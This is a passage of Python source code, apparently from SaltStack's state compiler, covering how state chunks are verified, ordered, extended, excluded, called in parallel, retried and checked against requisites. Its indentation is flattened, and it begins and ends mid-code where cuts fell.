reqs[req_val]["state"]
== reqs[name][req_val]
):
err = (
"A recursive "
"requisite was found, SLS "
'"{}" ID "{}" ID "{}"'
).format(
body["__sls__"],
name,
req_val,
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(
"Multiple dictionaries defined in "
"argument of state '{}' in SLS '{}'".format(
name, body["__sls__"]
)
)
if not fun:
if state == "require" or state == "watch":
continue
errors.append(
"No function declared in state '{}' in SLS '{}'".format(
state, body["__sls__"]
)
)
elif fun > 1:
errors.append(
"Too many functions declared in state '{}' in "
"SLS '{}'".format(state, body["__sls__"])
)
return errors
def verify_chunks(self, chunks):
"""
Verify the chunks in a list of low data structures
"""
err = []
for chunk in chunks:
err.extend(self.verify_data(chunk))
return err
def order_chunks(self, chunks):
"""
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
"""
cap = 1
for chunk in chunks:
if "order" in chunk:
if not isinstance(chunk["order"], int):
continue
chunk_order = chunk["order"]
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if "order" not in chunk:
chunk["order"] = cap
continue
if not isinstance(chunk["order"], (int, float)):
if chunk["order"] == "last":
chunk["order"] = cap + 1000000
elif chunk["order"] == "first":
chunk["order"] = 0
else:
chunk["order"] = cap
if "name_order" in chunk:
chunk["order"] = chunk["order"] + chunk.pop("name_order") / 10000.0
if chunk["order"] < 0:
chunk["order"] = cap + 1000000 + chunk["order"]
chunks.sort(
key=lambda chunk: (
chunk["order"],
"{0[state]}{0[name]}{0[fun]}".format(chunk),
)
)
return chunks
def compile_high_data(self, high, orchestration_jid=None):
"""
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
"""
chunks = []
for name, body in high.items():
if name.startswith("__"):
continue
for state, run in body.items():
funcs = set()
names = []
if state.startswith("__"):
continue
chunk = {"state": state, "name": name}
if orchestration_jid is not None:
chunk["__orchestration_jid__"] = orchestration_jid
if "__sls__" in body:
chunk["__sls__"] = body["__sls__"]
if "__env__" in body:
chunk["__env__"] = body["__env__"]
chunk["__id__"] = name
for arg in run:
if isinstance(arg, str):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in arg.items():
if key == "names":
for _name in val:
if _name not in names:
names.append(_name)
elif key == "state":
# Don't pass down a state override
continue
elif key == "name" and not isinstance(val, str):
# Invalid name, fall back to ID
chunk[key] = name
else:
chunk[key] = val
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(iter(entry.keys()))
live["name"] = low_name
list(map(live.update, entry[low_name]))
else:
live["name"] = entry
live["name_order"] = name_order
name_order += 1
for fun in funcs:
live["fun"] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live["fun"] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
def reconcile_extend(self, high):
"""
Pull the extend data and add it to the respective high data
"""
errors = []
if "__extend__" not in high:
return high, errors
ext = high.pop("__extend__")
for ext_chunk in ext:
for name, body in ext_chunk.items():
if name not in high:
state_type = next(x for x in body if not x.startswith("__"))
# Check for a matching 'name' override in high data
ids = find_name(name, state_type, high)
if len(ids) != 1:
errors.append(
"Cannot extend ID '{0}' in '{1}:{2}'. It is not "
"part of the high state.\n"
"This is likely due to a missing include statement "
"or an incorrectly typed ID.\nEnsure that a "
"state with an ID of '{0}' is available\nin "
"environment '{1}' and to SLS '{2}'".format(
name,
body.get("__env__", "base"),
body.get("__sls__", "base"),
)
)
continue
else:
name = ids[0][0]
for state, run in body.items():
if state.startswith("__"):
continue
if state not in high[name]:
high[name][state] = run
continue
# high[name][state] is extended by run, both are lists
for arg in run:
update = False
for hind in range(len(high[name][state])):
if isinstance(arg, str) and isinstance(
high[name][state][hind], str
):
# replacing the function, replace the index
high[name][state].pop(hind)
high[name][state].insert(hind, arg)
update = True
continue
if isinstance(arg, dict) and isinstance(
high[name][state][hind], dict
):
# It is an option, make sure the options match
argfirst = next(iter(arg))
if argfirst == next(iter(high[name][state][hind])):
# If argfirst is a requisite then we must merge
# our requisite with that of the target state
if argfirst in STATE_REQUISITE_KEYWORDS:
high[name][state][hind][argfirst].extend(
arg[argfirst]
)
# otherwise, its not a requisite and we are just extending (replacing)
else:
high[name][state][hind] = arg
update = True
if (
argfirst == "name"
and next(iter(high[name][state][hind])) == "names"
):
# If names are overwritten by name use the name
high[name][state][hind] = arg
if not update:
high[name][state].append(arg)
return high, errors
def apply_exclude(self, high):
"""
Read in the __exclude__ list and remove all excluded objects from the
high data
"""
if "__exclude__" not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop("__exclude__")
for exc in exclude:
if isinstance(exc, str):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(iter(exc.keys()))
if key == "sls":
ex_sls.add(exc["sls"])
elif key == "id":
ex_id.add(exc["id"])
# Now the excludes have been simplified, use them
if ex_sls:
# There are sls excludes, find the associated ids
for name, body in high.items():
if name.startswith("__"):
continue
sls = body.get("__sls__", "")
if not sls:
continue
for ex_ in ex_sls:
if fnmatch.fnmatch(sls, ex_):
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
def requisite_in(self, high):
"""
Extend the data reference with requisite_in arguments
"""
req_in = {
"require_in",
"watch_in",
"onfail_in",
"onchanges_in",
"use",
"use_in",
"prereq",
"prereq_in",
}
req_in_all = req_in.union(
{"require", "watch", "onfail", "onfail_stop", "onchanges"}
)
extend = {}
errors = []
disabled_reqs = self.opts.get("disabled_requisites", [])
if not isinstance(disabled_reqs, list):
disabled_reqs = [disabled_reqs]
for id_, body in high.items():
if not isinstance(body, dict):
continue
for state, run in body.items():
if state.startswith("__"):
continue
for arg in run:
if isinstance(arg, dict):
# It is not a function, verify that the arg is a
# requisite in statement
if len(arg) < 1:
# Empty arg dict
# How did we get this far?
continue
# Split out the components
key = next(iter(arg))
if key not in req_in:
continue
if key in disabled_reqs:
log.warning(
"The %s requisite has been disabled, Ignoring.", key
)
continue
rkey = key.split("_")[0]
items = arg[key]
if isinstance(items, dict):
# Formatted as a single req_in
for _state, name in items.items():
# Not a use requisite_in
found = False
if name not in extend:
extend[name] = OrderedDict()
if "." in _state:
errors.append(
"Invalid requisite in {}: {} for "
"{}, in SLS '{}'. Requisites must "
"not contain dots, did you mean '{}'?".format(
rkey,
_state,
name,
body["__sls__"],
_state[: _state.find(".")],
)
)
_state = _state.split(".")[0]
if _state not in extend[name]:
extend[name][_state] = []
extend[name]["__env__"] = body["__env__"]
extend[name]["__sls__"] = body["__sls__"]
for ind in range(len(extend[name][_state])):
if next(iter(extend[name][_state][ind])) == rkey:
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append({rkey: [{state: id_}]})
if isinstance(items, list):
# Formed as a list of requisite additions
hinges = []
for ind in items:
if not isinstance(ind, dict):
# Malformed req_in
if ind in high:
_ind_high = [
x
for x in high[ind]
if not x.startswith("__")
]
ind = {_ind_high[0]: ind}
else:
found = False
for _id in iter(high):
for state in [
state
for state in iter(high[_id])
if not state.startswith("__")
]:
for j in iter(high[_id][state]):
if (
isinstance(j, dict)
and "name" in j
):
if j["name"] == ind:
ind = {state: _id}
found = True
if not found:
continue
if len(ind) < 1:
continue
pstate = next(iter(ind))
pname = ind[pstate]
if pstate == "sls":
# Expand hinges here
hinges = find_sls_ids(pname, high)
else:
hinges.append((pname, pstate))
if "." in pstate:
errors.append(
"Invalid requisite in {}: {} for "
"{}, in SLS '{}'. Requisites must "
"not contain dots, did you mean '{}'?".format(
rkey,
pstate,
pname,
body["__sls__"],
pstate[: pstate.find(".")],
)
)
pstate = pstate.split(".")[0]
for tup in hinges:
name, _state = tup
if key == "prereq_in":
# Add prerequired to origin
if id_ not in extend:
extend[id_] = OrderedDict()
if state not in extend[id_]:
extend[id_][state] = []
extend[id_][state].append(
{"prerequired": [{_state: name}]}
)
if key == "prereq":
# Add prerequired to prereqs
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if ext_id not in extend:
extend[ext_id] = OrderedDict()
if _req_state not in extend[ext_id]:
extend[ext_id][_req_state] = []
extend[ext_id][_req_state].append(
{"prerequired": [{state: id_}]}
)
continue
if key == "use_in":
# Add the running states args to the
# use_in states
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if not ext_id:
continue
ext_args = state_args(ext_id, _state, high)
if ext_id not in extend:
extend[ext_id] = OrderedDict()
if _req_state not in extend[ext_id]:
extend[ext_id][_req_state] = []
ignore_args = req_in_all.union(ext_args)
for arg in high[id_][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(iter(arg.keys())) == "name":
continue
if next(iter(arg.keys())) == "names":
continue
extend[ext_id][_req_state].append(arg)
continue
if key == "use":
# Add the use state's args to the
# running state
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if not ext_id:
continue
loc_args = state_args(id_, state, high)
if id_ not in extend:
extend[id_] = OrderedDict()
if state not in extend[id_]:
extend[id_][state] = []
ignore_args = req_in_all.union(loc_args)
for arg in high[ext_id][_req_state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(iter(arg.keys())) == "name":
continue
if next(iter(arg.keys())) == "names":
continue
extend[id_][state].append(arg)
continue
found = False
if name not in extend:
extend[name] = OrderedDict()
if _state not in extend[name]:
extend[name][_state] = []
extend[name]["__env__"] = body["__env__"]
extend[name]["__sls__"] = body["__sls__"]
for ind in range(len(extend[name][_state])):
if (
next(iter(extend[name][_state][ind]))
== rkey
):
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append({rkey: [{state: id_}]})
high["__extend__"] = []
for key, val in extend.items():
high["__extend__"].append({key: val})
req_in_high, req_in_errors = self.reconcile_extend(high)
errors.extend(req_in_errors)
return req_in_high, errors
def _call_parallel_target(self, name, cdata, low):
"""
The target function to call that will create the parallel thread/process
"""
# we need to re-record start/end duration here because it is impossible to
# correctly calculate further down the chain
utc_start_time = datetime.datetime.utcnow()
self.format_slots(cdata)
tag = _gen_tag(low)
try:
ret = self.states[cdata["full"]](*cdata["args"], **cdata["kwargs"])
except Exception as exc: # pylint: disable=broad-except
log.debug(
"An exception occurred in this state: %s",
exc,
exc_info_on_loglevel=logging.DEBUG,
)
trb = traceback.format_exc()
ret = {
"result": False,
"name": name,
"changes": {},
"comment": "An exception occurred in this state: {}".format(trb),
}
utc_finish_time = datetime.datetime.utcnow()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
ret["duration"] = duration
troot = os.path.join(self.opts["cachedir"], self.jid)
tfile = os.path.join(troot, salt.utils.hashutils.sha1_digest(tag))
if not os.path.isdir(troot):
try:
os.makedirs(troot)
except OSError:
# Looks like the directory was created between the check
# and the attempt, we are safe to pass
pass
with salt.utils.files.fopen(tfile, "wb+") as fp_:
fp_.write(msgpack_serialize(ret))
def call_parallel(self, cdata, low):
"""
Call the state defined in the given cdata in parallel
"""
# There are a number of possibilities to not have the cdata
# populated with what we might have expected, so just be smart
# enough to not raise another KeyError as the name is easily
# guessable and fallback in all cases to present the real
# exception to the user
name = (cdata.get("args") or [None])[0] or cdata["kwargs"].get("name")
if not name:
name = low.get("name", low.get("__id__"))
proc = salt.utils.process.Process(
target=self._call_parallel_target, args=(name, cdata, low)
)
proc.start()
ret = {
"name": name,
"result": None,
"changes": {},
"comment": "Started in a separate process",
"proc": proc,
}
return ret
@salt.utils.decorators.state.OutputUnifier("content_check", "unify")
def call(self, low, chunks=None, running=None, retries=1):
"""
Call a state directly with the low data structure, verify data
before processing.
"""
utc_start_time = datetime.datetime.utcnow()
local_start_time = utc_start_time - (
datetime.datetime.utcnow() - datetime.datetime.now()
)
log.info(
"Running state [%s] at time %s",
low["name"].strip() if isinstance(low["name"], str) else low["name"],
local_start_time.time().isoformat(),
)
errors = self.verify_data(low)
if errors:
ret = {
"result": False,
"name": low["name"],
"changes": {},
"comment": "",
}
for err in errors:
ret["comment"] += "{}\n".format(err)
ret["__run_num__"] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
return ret
else:
ret = {"result": False, "name": low["name"], "changes": {}}
self.state_con["runas"] = low.get("runas", None)
if low["state"] == "cmd" and "password" in low:
self.state_con["runas_password"] = low["password"]
else:
self.state_con["runas_password"] = low.get("runas_password", None)
if not low.get("__prereq__"):
log.info(
"Executing state %s.%s for [%s]",
low["state"],
low["fun"],
low["name"].strip() if isinstance(low["name"], str) else low["name"],
)
if "provider" in low:
self.load_modules(low)
state_func_name = "{0[state]}.{0[fun]}".format(low)
cdata = salt.utils.args.format_call(
self.states[state_func_name],
low,
initial_ret={"full": state_func_name},
expected_extra_kws=STATE_INTERNAL_KEYWORDS,
)
inject_globals = {
# Pass a copy of the running dictionary, the low state chunks and
# the current state dictionaries.
# We pass deep copies here because we don't want any misbehaving
# state module to change these at runtime.
"__low__": immutabletypes.freeze(low),
"__running__": immutabletypes.freeze(running) if running else {},
"__instance_id__": self.instance_id,
"__lowstate__": immutabletypes.freeze(chunks) if chunks else {},
}
if "__env__" in low:
inject_globals["__env__"] = str(low["__env__"])
if self.inject_globals:
inject_globals.update(self.inject_globals)
if low.get("__prereq__"):
test = sys.modules[self.states[cdata["full"]].__module__].__opts__["test"]
sys.modules[self.states[cdata["full"]].__module__].__opts__["test"] = True
try:
# Let's get a reference to the salt environment to use within this
# state call.
#
# If the state function accepts an 'env' keyword argument, it
# allows the state to be overridden(we look for that in cdata). If
# that's not found in cdata, we look for what we're being passed in
# the original data, namely, the special dunder __env__. If that's
# not found we default to 'base'
req_list = ("unless", "onlyif", "creates")
if (
any(req in low for req in req_list)
and "{0[state]}.mod_run_check".format(low) not in self.states
):
ret.update(self._run_check(low))
if not self.opts.get("lock_saltenv", False):
# NOTE: Overriding the saltenv when lock_saltenv is blocked in
# salt/modules/state.py, before we ever get here, but this
# additional check keeps use of the State class outside of the
# salt/modules/state.py from getting around this setting.
if "saltenv" in low:
inject_globals["__env__"] = str(low["saltenv"])
elif isinstance(cdata["kwargs"].get("env", None), str):
# User is using a deprecated env setting which was parsed by
# format_call.
# We check for a string type since module functions which
# allow setting the OS environ also make use of the "env"
# keyword argument, which is not a string
inject_globals["__env__"] = str(cdata["kwargs"]["env"])
if "__env__" not in inject_globals:
# Let's use the default environment
inject_globals["__env__"] = "base"
if "__orchestration_jid__" in low:
inject_globals["__orchestration_jid__"] = low["__orchestration_jid__"]
if "result" not in ret or ret["result"] is False:
self.states.inject_globals = inject_globals
if self.mocked:
ret = mock_ret(cdata)
else:
# Execute the state function
if not low.get("__prereq__") and low.get("parallel"):
# run the state call in parallel, but only if not in a prereq
ret = self.call_parallel(cdata, low)
else:
self.format_slots(cdata)
ret = self.states[cdata["full"]](
*cdata["args"], **cdata["kwargs"]
)
self.states.inject_globals = {}
if (
"check_cmd" in low
and "{0[state]}.mod_run_check_cmd".format(low) not in self.states
):
ret.update(self._run_check_cmd(low))
except Exception as exc: # pylint: disable=broad-except
log.debug(
"An exception occurred in this state: %s",
exc,
exc_info_on_loglevel=logging.DEBUG,
)
trb = traceback.format_exc()
# There are a number of possibilities to not have the cdata
# populated with what we might have expected, so just be smart
# enough to not raise another KeyError as the name is easily
# guessable and fallback in all cases to present the real
# exception to the user
name = (cdata.get("args") or [None])[0] or cdata["kwargs"].get("name")
if not name:
name = low.get("name", low.get("__id__"))
ret = {
"result": False,
"name": name,
"changes": {},
"comment": "An exception occurred in this state: {}".format(trb),
}
finally:
if low.get("__prereq__"):
sys.modules[self.states[cdata["full"]].__module__].__opts__[
"test"
] = test
self.state_con.pop("runas", None)
self.state_con.pop("runas_password", None)
if not isinstance(ret, dict):
return ret
# If format_call got any warnings, let's show them to the user
if "warnings" in cdata:
ret.setdefault("warnings", []).extend(cdata["warnings"])
if "provider" in low:
self.load_modules()
if low.get("__prereq__"):
low["__prereq__"] = False
return ret
ret["__sls__"] = low.get("__sls__")
ret["__run_num__"] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
utc_finish_time = datetime.datetime.utcnow()
timezone_delta = datetime.datetime.utcnow() - datetime.datetime.now()
local_finish_time = utc_finish_time - timezone_delta
local_start_time = utc_start_time - timezone_delta
ret["start_time"] = local_start_time.time().isoformat()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
ret["duration"] = duration
ret["__id__"] = low["__id__"]
log.info(
"Completed state [%s] at time %s (duration_in_ms=%s)",
low["name"].strip() if isinstance(low["name"], str) else low["name"],
local_finish_time.time().isoformat(),
duration,
)
if "retry" in low:
low["retry"] = self.verify_retry_data(low["retry"])
if not sys.modules[self.states[cdata["full"]].__module__].__opts__["test"]:
if low["retry"]["until"] != ret["result"]:
if low["retry"]["attempts"] > retries:
interval = low["retry"]["interval"]
if low["retry"]["splay"] != 0:
interval = interval + random.randint(
0, low["retry"]["splay"]
)
log.info(
"State result does not match retry until value, "
"state will be re-run in %s seconds",
interval,
)
self.functions["test.sleep"](interval)
retry_ret = self.call(low, chunks, running, retries=retries + 1)
orig_ret = ret
ret = retry_ret
ret["comment"] = "\n".join(
[
(
'Attempt {}: Returned a result of "{}", '
'with the following comment: "{}"'.format(
retries, orig_ret["result"], orig_ret["comment"]
)
),
"" if not ret["comment"] else ret["comment"],
]
)
ret["duration"] = (
ret["duration"] + orig_ret["duration"] + (interval * 1000)
)
if retries == 1:
ret["start_time"] = orig_ret["start_time"]
else:
ret["comment"] = " ".join(
[
"" if not ret["comment"] else str(ret["comment"]),
(
"The state would be retried every {1} seconds "
"(with a splay of up to {3} seconds) "
"a maximum of {0} times or until a result of {2} "
"is returned"
).format(
low["retry"]["attempts"],
low["retry"]["interval"],
low["retry"]["until"],
low["retry"]["splay"],
),
]
)
return ret
def __eval_slot(self, slot):
log.debug("Evaluating slot: %s", slot)
fmt = slot.split(":", 2)
if len(fmt) != 3:
log.warning("Malformed slot: %s", slot)
return slot
if fmt[1] != "salt":
log.warning("Malformed slot: %s", slot)
log.warning(
"Only execution modules are currently supported in slots. This means slot "
'should start with "__slot__:salt:"'
)
return slot
fun, args, kwargs = salt.utils.args.parse_function(fmt[2])
if not fun or fun not in self.functions:
log.warning("Malformed slot: %s", slot)
log.warning(
"Execution module should be specified in a function call format: "
"test.arg('arg', kw='kwarg')"
)
return slot
log.debug("Calling slot: %s(%s, %s)", fun, args, kwargs)
slot_return = self.functions[fun](*args, **kwargs)
# Given input __slot__:salt:test.arg(somekey="value").not.exist ~ /appended
# slot_text should be __slot...).not.exist
# append_data should be ~ /appended
slot_text = fmt[2].split("~")[0]
append_data = fmt[2].split("~", 1)[1:]
log.debug("slot_text: %s", slot_text)
log.debug("append_data: %s", append_data)
# Support parsing slot dict response
# return_get should result in a kwargs.nested.dict path by getting
# everything after first closing paren: )
return_get = None
try:
return_get = slot_text[slot_text.rindex(")") + 1 :]
except ValueError:
pass
if return_get:
# remove first period
return_get = return_get.split(".", 1)[1].strip()
log.debug("Searching slot result %s for %s", slot_return, return_get)
slot_return = salt.utils.data.traverse_dict_and_list(
slot_return, return_get, default=None, delimiter="."
)
if append_data:
if isinstance(slot_return, str):
# Append text to slot string result
append_data = " ".join(append_data).strip()
log.debug("appending to slot result: %s", append_data)
slot_return += append_data
else:
log.error("Ignoring slot append, slot result is not a string")
return slot_return
def format_slots(self, cdata):
"""
Read in the arguments from the low level slot syntax to make a last
minute runtime call to gather relevant data for the specific routine
Will parse strings, first level of dictionary values, and strings and
first level dict values inside of lists
"""
# __slot__:salt.cmd.run(foo, bar, baz=qux)
SLOT_TEXT = "__slot__:"
ctx = (("args", enumerate(cdata["args"])), ("kwargs", cdata["kwargs"].items()))
for atype, avalues in ctx:
for ind, arg in avalues:
arg = salt.utils.data.decode(arg, keep=True)
if isinstance(arg, dict):
# Search dictionary values for __slot__:
for key, value in arg.items():
try:
if value.startswith(SLOT_TEXT):
log.trace("Slot processsing dict value %s", value)
cdata[atype][ind][key] = self.__eval_slot(value)
except AttributeError:
# Not a string/slot
continue
elif isinstance(arg, list):
for idx, listvalue in enumerate(arg):
log.trace("Slot processing list value: %s", listvalue)
if isinstance(listvalue, dict):
# Search dict values in list for __slot__:
for key, value in listvalue.items():
try:
if value.startswith(SLOT_TEXT):
log.trace(
"Slot processsing nested dict value %s",
value,
)
cdata[atype][ind][idx][key] = self.__eval_slot(
value
)
except AttributeError:
# Not a string/slot
continue
if isinstance(listvalue, str):
# Search strings in a list for __slot__:
if listvalue.startswith(SLOT_TEXT):
log.trace(
"Slot processsing nested string %s", listvalue
)
cdata[atype][ind][idx] = self.__eval_slot(listvalue)
elif isinstance(arg, str) and arg.startswith(SLOT_TEXT):
# Search strings for __slot__:
log.trace("Slot processsing %s", arg)
cdata[atype][ind] = self.__eval_slot(arg)
else:
# Not a slot, skip it
continue
def verify_retry_data(self, retry_data):
"""
verifies the specified retry data
"""
retry_defaults = {
"until": True,
"attempts": 2,
"splay": 0,
"interval": 30,
}
expected_data = {
"until": bool,
"attempts": int,
"interval": int,
"splay": int,
}
validated_retry_data = {}
if isinstance(retry_data, dict):
for expected_key, value_type in expected_data.items():
if expected_key in retry_data:
if isinstance(retry_data[expected_key], value_type):
validated_retry_data[expected_key] = retry_data[expected_key]
else:
log.warning(
"An invalid value was passed for the retry %s, "
"using default value '%s'",
expected_key,
retry_defaults[expected_key],
)
validated_retry_data[expected_key] = retry_defaults[
expected_key
]
else:
validated_retry_data[expected_key] = retry_defaults[expected_key]
else:
log.warning(
"State is set to retry, but a valid dict for retry "
"configuration was not found. Using retry defaults"
)
validated_retry_data = retry_defaults
return validated_retry_data
def call_chunks(self, chunks):
"""
Iterate over a list of chunks and call them, checking for requires.
"""
# Check for any disabled states
disabled = {}
if "state_runs_disabled" in self.opts["grains"]:
for low in chunks[:]:
state_ = "{}.{}".format(low["state"], low["fun"])
for pat in self.opts["grains"]["state_runs_disabled"]:
if fnmatch.fnmatch(state_, pat):
comment = (
'The state function "{0}" is currently disabled by "{1}", '
"to re-enable, run state.enable {1}."
).format(state_, pat,)
_tag = _gen_tag(low)
disabled[_tag] = {
"changes": {},
"result": False,
"comment": comment,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
chunks.remove(low)
break
running = {}
for low in chunks:
if "__FAILHARD__" in running:
running.pop("__FAILHARD__")
return running
tag = _gen_tag(low)
if tag not in running:
# Check if this low chunk is paused
action = self.check_pause(low)
if action == "kill":
break
running = self.call_chunk(low, running, chunks)
if self.check_failhard(low, running):
return running
self.active = set()
while True:
if self.reconcile_procs(running):
break
time.sleep(0.01)
ret = dict(list(disabled.items()) + list(running.items()))
return ret
def check_failhard(self, low, running):
"""
Check if the low data chunk should send a failhard signal
"""
tag = _gen_tag(low)
if self.opts.get("test", False):
return False
if low.get("failhard", self.opts["failhard"]) and tag in running:
if running[tag]["result"] is None:
return False
return not running[tag]["result"]
return False
def check_pause(self, low):
"""
Check to see if this low chunk has been paused
"""
if not self.jid:
# Can't pause on salt-ssh since we can't track continuous state
return
pause_path = os.path.join(self.opts["cachedir"], "state_pause", self.jid)
start = time.time()
if os.path.isfile(pause_path):
try:
while True:
tries = 0
with salt.utils.files.fopen(pause_path, "rb") as fp_:
try:
pdat = msgpack_deserialize(fp_.read())
except salt.utils.msgpack.exceptions.UnpackValueError:
# Reading race condition
if tries > 10:
# Break out if there are a ton of read errors
return
tries += 1
time.sleep(1)
continue
id_ = low["__id__"]
key = ""
if id_ in pdat:
key = id_
elif "__all__" in pdat:
key = "__all__"
if key:
if "duration" in pdat[key]:
now = time.time()
if now - start > pdat[key]["duration"]:
return "run"
if "kill" in pdat[key]:
return "kill"
else:
return "run"
time.sleep(1)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Failed to read in pause data for file located at: %s", pause_path
)
return "run"
return "run"
def reconcile_procs(self, running):
"""
Check the running dict for processes and resolve them
"""
retset = set()
for tag in running:
proc = running[tag].get("proc")
if proc:
if not proc.is_alive():
ret_cache = os.path.join(
self.opts["cachedir"],
self.jid,
salt.utils.hashutils.sha1_digest(tag),
)
if not os.path.isfile(ret_cache):
ret = {
"result": False,
"comment": "Parallel process failed to return",
"name": running[tag]["name"],
"changes": {},
}
try:
with salt.utils.files.fopen(ret_cache, "rb") as fp_:
ret = msgpack_deserialize(fp_.read())
except OSError:
ret = {
"result": False,
"comment": "Parallel cache failure",
"name": running[tag]["name"],
"changes": {},
}
running[tag].update(ret)
running[tag].pop("proc")
else:
retset.add(False)
return False not in retset
def check_requisite(self, low, running, chunks, pre=False):
"""
Look into the running data to check the status of all requisite
states
"""
disabled_reqs = self.opts.get("disabled_requisites", [])
if not isinstance(disabled_reqs, list):
disabled_reqs = [disabled_reqs]
present = False
# If mod_watch is not available make it a require
if "watch" in low:
if "{}.mod_watch".format(low["state"]) not in self.states:
if "require" in low:
low["require"].extend(low.pop("watch"))
else:
low["require"] = low.pop("watch")
else:
present = True
if "watch_any" in low:
if "{}.mod_watch".format(low["state"]) not in self.states:
if "require_any" in low:
low["require_any"].extend(low.pop("watch_any"))
else:
low["require_any"] = low.pop("watch_any")
else:
present = True
if "require" in low:
present = True
if "require_any" in low:
present = True
if "prerequired" in low:
present = True
if "prereq" in low:
present = True
if "onfail" in low:
present = True
if "onfail_any" in low:
present = True
if "onfail_all" in low:
present = True
if "onchanges" in low:
present = True
if "onchanges_any" in low:
present = True
if not present:
return "met", ()
self.reconcile_procs(running)
reqs = {
"require": [],
"require_any": [],
"watch": [],
"watch_any": [],
"prereq": [],
"onfail": [],
"onfail_any": [],
"onfail_all": [],
"onchanges": [],
"onchanges_any": [],
}
if pre:
reqs["prerequired"] = []
for r_state in reqs:
if r_state in low and low[r_state] is not None:
if r_state in disabled_reqs:
log.warning(
"The %s requisite has been disabled, Ignoring.", r_state
)
continue
for req in low[r_state]:
if isinstance(req, str):
req = {"id": req}
req = trim_req(req)
found = False
for chunk in chunks:
req_key = next(iter(req))
req_val = req[req_key]
if req_val is None:
continue
if req_key == "sls":
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk["__sls__"], req_val):
found = True
reqs[r_state].append(chunk)
continue
try:
if isinstance(req_val, str):
if fnmatch.fnmatch(
chunk["name"], req_val
) or fnmatch.fnmatch(chunk["__id__"], req_val):
if req_key == "id" or chunk["state"] == req_key:
found = True
reqs[r_state].append(chunk)
else:
raise KeyError
except KeyError as exc:
raise SaltRenderError(
"Could not locate requisite of [{}] present in state with name [{}]".format(
req_key, chunk["name"]
)
)
except TypeError:
# On Python 2, the above req_val, being an OrderedDict, will raise a KeyError,
# however on Python 3 it will raise a TypeError
# This was found when running tests.unit.test_state.StateCompilerTestCase.test_render_error_on_invalid_requisite
raise SaltRenderError(
"Could not locate requisite of [{}] present in state with name [{}]".format(
req_key, chunk["name"]
)
)
if not found:
return "unmet", ()
fun_stats = set()
for r_state, chunks in reqs.items():
req_stats = set()
if r_state.startswith("prereq") and not r_state.startswith("prerequired"):
run_dict = self.pre
else:
run_dict = running
filtered_run_dict = {}
for chunk in chunks:
tag = _gen_tag(chunk)
run_dict_chunk = run_dict.get(tag)
if run_dict_chunk:
filtered_run_dict[tag] = run_dict_chunk
run_dict = filtered_run_dict
while True:
if self.reconcile_procs(run_dict):
break
time.sleep(0.01)
for chunk in chunks:
tag = _gen_tag(chunk)
if tag not in run_dict:
req_stats.add("unmet")
continue
if r_state.startswith("onfail"):
if run_dict[tag]["result"] is True:
req_stats.add("onfail") # At least one state is OK
continue
else:
if run_dict[tag]["result"] is False:
req_stats.add("fail")
continue
if r_state.startswith("onchanges"):
if not run_dict[tag]["changes"]:
req_stats.add("onchanges")
else:
req_stats.add("onchangesmet")
continue
if r_state.startswith("watch") and run_dict[tag]["changes"]:
req_stats.add("change")
continue
if r_state.startswith("prereq") and run_dict[tag]["result"] is None:
if not r_state.startswith("prerequired"):
req_stats.add("premet")
if r_state.startswith("prereq") and not run_dict[tag]["result"] is None:
if not r_state.startswith("prerequired"):
req_stats.add("pre")
else:
if run_dict[tag].get("__state_ran__", True):
req_stats.add("met")
if r_state.endswith("_any") or r_state == "onfail":
if "met" in req_stats or "change" in req_stats:
if "fail" in req_stats:
req_stats.remove("fail")
if "onchangesmet" in req_stats:
if "onchanges" in req_stats:
req_stats.remove("onchanges")
if "fail" in req_stats:
req_stats.remove("fail")
if "onfail" in req_stats:
# a met requisite in this case implies a success
if "met" in req_stats:
req_stats.remove("onfail")
if r_state.endswith("_all"):
if "onfail" in req_stats:
# a met requisite in this case implies a failure
if "met" in req_stats:
req_stats.remove("met")
fun_stats.update(req_stats)
if "unmet" in fun_stats:
status = "unmet"
elif "fail" in fun_stats:
status = "fail"
elif "pre" in fun_stats:
if "premet" in fun_stats:
status = "met"
else:
status = "pre"
elif "onfail" in fun_stats and "onchangesmet" not in fun_stats:
status = "onfail"
elif "onchanges" in fun_stats and "onchangesmet" not in fun_stats:
status = "onchanges"
elif "change" in fun_stats:
status = "change"
else:
status = "met"
return status, reqs
def event(self, chunk_ret, length, fire_event=False):
"""
Fire an event on the master bus
If `fire_event` is set to True an event will be sent with the
chunk name in the tag and the chunk result in the event data.
If `fire_event` is set to a string such as `mystate/is/finished`,
an event will be sent with the string added to the tag and the chunk
result in the event data.
